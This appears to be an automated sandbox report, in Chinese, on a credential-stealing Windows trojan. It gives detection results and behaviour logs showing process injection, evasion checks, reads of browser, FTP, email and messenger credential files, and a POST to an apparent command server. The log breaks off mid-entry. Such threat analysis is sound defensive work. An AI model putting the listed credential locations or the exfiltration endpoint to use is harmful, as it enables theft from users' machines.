14.0
0-day
51 个模型检测该样本为恶意!
重新分析
更多

4c5ec39d443bac5571dede827a468d97a3aaa6d1e3b90d6c3e3f98fd6ea4fe98

da9553fee49b148e4b7f08b767adab95.exe

分析耗时

116s

最近分析

文件大小

383.5KB
静态报毒 动态报毒 100% AGENSLA AGENTTESLA AI SCORE=87 APVU AVSARHER BSK66A CONFIDENCE ELDORADO FAREIT GDSDA GENERICKD HIGH CONFIDENCE HVFBMX JNNHR KRYPTIK MALWARE@#7IF6IGV451X1 MALWAREX PUTTY QVM03 R + TROJ R350011 SCORE SIGGEN2 SUSGEN SUSPICIOUS PE TROJANPSW UNSAFE XM0@A0RDM9P YAKBEEXMSIL ZEMSILCO 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Fareit-FZD!DA9553FEE49B 20201023 6.0.6.653
Alibaba TrojanPSW:MSIL/AgentTesla.8b680041 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:MalwareX-gen [Trj] 20201023 18.4.3895.0
Kingsoft 20201023 2013.8.14.323
Tencent 20201023 1.0.0.1
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (3 个事件)
Time & API Arguments Status Return Repeated
1619962683.582124
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619962685.192124
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619962686.536124
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (4 个事件)
Time & API Arguments Status Return Repeated
1619948413.636343
IsDebuggerPresent
failed 0 0
1619948455.245343
IsDebuggerPresent
failed 0 0
1619948455.745343
IsDebuggerPresent
failed 0 0
1619948456.245343
IsDebuggerPresent
failed 0 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619948451.620343
GlobalMemoryStatusEx
success 1 0
One or more processes crashed (1 个事件)
Time & API Arguments Status Return Repeated
1619962688.036124
__exception__
stacktrace: 
da9553fee49b148e4b7f08b767adab95+0x12fdd @ 0x412fdd
da9553fee49b148e4b7f08b767adab95+0x1296e @ 0x41296e
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 43777300
registers.edi: 34876374
registers.eax: 43778080
registers.ebp: 43777308
registers.edx: 8998912
registers.ebx: 43778080
registers.esi: 757113997
registers.ecx: 0
exception.instruction_r: 8a 0a 88 0c 17 42 4e 75 f7 5f 5e 5d c3 55 8b ec
exception.symbol: da9553fee49b148e4b7f08b767adab95+0x2b41
exception.instruction: mov cl, byte ptr [edx]
exception.module: da9553fee49b148e4b7f08b767adab95.exe
exception.exception_code: 0xc0000005
exception.offset: 11073
exception.address: 0x402b41
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header, HTTP version 1.0 used suspicious_request POST http://reiangkor.com/admin/lang/css/king/admin/fre.php
Performs some HTTP requests (1 个事件)
request POST http://reiangkor.com/admin/lang/css/king/admin/fre.php
Sends data using the HTTP POST Method (1 个事件)
request POST http://reiangkor.com/admin/lang/css/king/admin/fre.php
Allocates read-write-execute memory (usually to unpack itself) (50 out of 86 个事件)
Time & API Arguments Status Return Repeated
1619948412.526343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x00a90000
success 0 0
1619948412.526343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c60000
success 0 0
1619948413.370343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f31000
success 0 0
1619948413.636343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008da000
success 0 0
1619948413.636343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f32000
success 0 0
1619948413.636343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008d2000
success 0 0
1619948414.026343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008e2000
success 0 0
1619948414.276343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008e3000
success 0 0
1619948414.276343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0091b000
success 0 0
1619948414.276343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00917000
success 0 0
1619948414.292343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008ec000
success 0 0
1619948414.933343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008e4000
success 0 0
1619948414.933343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008e5000
success 0 0
1619948414.964343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008e6000
success 0 0
1619948414.980343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a40000
success 0 0
1619948415.042343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008e7000
success 0 0
1619948415.073343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008fa000
success 0 0
1619948415.073343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008f7000
success 0 0
1619948415.089343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0090a000
success 0 0
1619948415.120343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008db000
success 0 0
1619948415.151343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008f6000
success 0 0
1619948415.198343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a41000
success 0 0
1619948415.480343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008ea000
success 0 0
1619948415.511343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a42000
success 0 0
1619948415.511343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00902000
success 0 0
1619948415.589343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00915000
success 0 0
1619948415.745343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008e8000
success 0 0
1619948415.855343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x045d0000
success 0 0
1619948448.995343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x04ce0000
success 0 0
1619948448.995343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c61000
success 0 0
1619948449.230343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0090c000
success 0 0
1619948449.308343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008e9000
success 0 0
1619948449.495343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a43000
success 0 0
1619948449.589343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 243712
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x04d10400
failed 3221225550 0
1619948454.448343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a44000
success 0 0
1619948454.464343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x04e60000
success 0 0
1619948454.464343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a45000
success 0 0
1619948454.480343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a46000
success 0 0
1619948454.558343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a47000
success 0 0
1619948454.636343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a48000
success 0 0
1619948454.870343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a49000
success 0 0
1619948455.120343
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00a4a000
success 0 0
1619948455.136343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x04d10178
failed 3221225550 0
1619948455.136343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x04d101a0
failed 3221225550 0
1619948455.136343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x04d101c8
failed 3221225550 0
1619948455.136343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x04d101f0
failed 3221225550 0
1619948455.136343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x04d10218
failed 3221225550 0
1619948455.136343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 11
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x04d4c5ce
failed 3221225550 0
1619948455.136343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 11
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x04d4c5c2
failed 3221225550 0
1619948455.136343
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 72
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x04d4bc00
failed 3221225550 0
Steals private information from local Internet browsers (19 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619962686.489124
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\da9553fee49b148e4b7f08b767adab95.exe
newfilepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
newfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
flags: 1
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\da9553fee49b148e4b7f08b767adab95.exe
success 1 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.823414282486581 section {'size_of_data': '0x0005f400', 'virtual_address': '0x00002000', 'entropy': 7.823414282486581, 'name': '.text', 'virtual_size': '0x0005f330'} description A section with a high entropy has been found
entropy 0.9947780678851175 description Overall entropy of this PE file is high
Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 个事件)
Time & API Arguments Status Return Repeated
1619948449.589343
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1619962685.082124
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Terminates another process (4 个事件)
Time & API Arguments Status Return Repeated
1619948455.714343
NtTerminateProcess
status_code: 0xffffffff
process_identifier: 2448
process_handle: 0x00011490
failed 0 0
1619948455.714343
NtTerminateProcess
status_code: 0xffffffff
process_identifier: 2448
process_handle: 0x00011490
success 0 0
1619948456.042343
NtTerminateProcess
status_code: 0xffffffff
process_identifier: 2796
process_handle: 0x00011498
failed 0 0
1619948456.042343
NtTerminateProcess
status_code: 0xffffffff
process_identifier: 2796
process_handle: 0x00011498
success 0 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Allocates execute permission to another process indicative of possible code injection (3 个事件)
Time & API Arguments Status Return Repeated
1619948455.417343
NtAllocateVirtualMemory
process_identifier: 2448
region_size: 663552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0001148c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
failed 3221225496 0
1619948455.808343
NtAllocateVirtualMemory
process_identifier: 2796
region_size: 663552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0000d4a0
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
failed 3221225496 0
1619948456.120343
NtAllocateVirtualMemory
process_identifier: 2840
region_size: 663552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00006d8c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
success 0 0
Harvests credentials from local FTP client softwares (22 个事件)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Manipulates memory of a non-child process indicative of process injection (4 个事件)
Process injection Process 2856 manipulating memory of non-child process 2448
Process injection Process 2856 manipulating memory of non-child process 2796
Time & API Arguments Status Return Repeated
1619948455.417343
NtAllocateVirtualMemory
process_identifier: 2448
region_size: 663552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0001148c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
failed 3221225496 0
1619948455.808343
NtAllocateVirtualMemory
process_identifier: 2796
region_size: 663552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0000d4a0
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
failed 3221225496 0
Potential code injection by writing to the memory of another process (3 个事件)
Time & API Arguments Status Return Repeated
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $ÌÍxþˆ¬­ˆ¬­ˆ¬­Ô•­‰¬­K£K­Š¬­ ­‰¬­=2󭋬­ˆ¬­Œ¬­Ôƒ­‰¬­ˆ¬­Ç¬­Ô…­™¬­=2÷­ó¬­=2È­‰¬­Richˆ¬­PEL…lWà  8¢Þ9P@ €ЎdP\.textõ68 `.rdata`@PB<@@.data$^ ~@À.x €À
process_handle: 0x00006d8c
base_address: 0x00400000
success 1 0
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer: ™TÍ<¨‡K¢`ˆˆÝ;U
process_handle: 0x00006d8c
base_address: 0x0041a000
success 1 0
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer: @
process_handle: 0x00006d8c
base_address: 0x7efde008
success 1 0
Code injection by writing an executable or DLL to the memory of another process (1 个事件)
Time & API Arguments Status Return Repeated
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $ÌÍxþˆ¬­ˆ¬­ˆ¬­Ô•­‰¬­K£K­Š¬­ ­‰¬­=2󭋬­ˆ¬­Œ¬­Ôƒ­‰¬­ˆ¬­Ç¬­Ô…­™¬­=2÷­ó¬­=2È­‰¬­Richˆ¬­PEL…lWà  8¢Þ9P@ €ЎdP\.textõ68 `.rdata`@PB<@@.data$^ ~@À.x €À
process_handle: 0x00006d8c
base_address: 0x00400000
success 1 0
Harvests credentials from local email clients (3 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 2856 called NtSetContextThread to modify thread in remote process 2840
Time & API Arguments Status Return Repeated
1619948456.120343
NtSetContextThread
thread_handle: 0x00011498
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2840
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 2856 resumed a thread in remote process 2840
Time & API Arguments Status Return Repeated
1619948456.355343
NtResumeThread
thread_handle: 0x00011498
suspend_count: 1
process_identifier: 2840
success 0 0
Executed a process and injected code into it, probably while unpacking (24 个事件)
Time & API Arguments Status Return Repeated
1619948413.636343
NtResumeThread
thread_handle: 0x000000d0
suspend_count: 1
process_identifier: 2856
success 0 0
1619948413.714343
NtResumeThread
thread_handle: 0x0000015c
suspend_count: 1
process_identifier: 2856
success 0 0
1619948454.683343
NtGetContextThread
thread_handle: 0x0000015c
success 0 0
1619948454.698343
NtResumeThread
thread_handle: 0x0000015c
suspend_count: 1
process_identifier: 2856
success 0 0
1619948455.214343
NtResumeThread
thread_handle: 0x000048e0
suspend_count: 1
process_identifier: 2856
success 0 0
1619948455.245343
NtResumeThread
thread_handle: 0x00007540
suspend_count: 1
process_identifier: 2856
success 0 0
1619948455.417343
